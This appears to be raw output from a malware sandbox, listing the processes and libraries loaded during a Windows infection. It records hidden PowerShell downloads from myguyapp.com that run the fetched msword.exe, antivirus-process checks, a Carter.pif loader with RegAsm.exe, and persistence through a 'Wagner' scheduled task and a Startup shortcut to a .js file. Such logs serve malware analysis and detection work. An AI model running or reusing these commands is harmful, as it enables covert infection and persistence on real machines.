              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
